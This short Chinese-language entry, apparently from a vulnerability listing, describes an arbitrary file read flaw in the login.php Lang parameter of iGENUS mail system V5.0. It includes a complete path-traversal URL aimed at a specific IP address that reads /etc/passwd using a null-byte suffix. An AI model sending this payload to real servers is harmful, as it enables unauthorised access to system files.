1 matches found
iGENUS 邮件系统 V5.0 任意文件读取漏洞
login.php 文件中,选择语言环境后会读取语言文件,并加载到页面,后台接到请求后,没有对 Lang 参数过滤,就直接读取文件,从而造成任意文件读取漏洞。 http://221.130.182.230/igenus/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpg...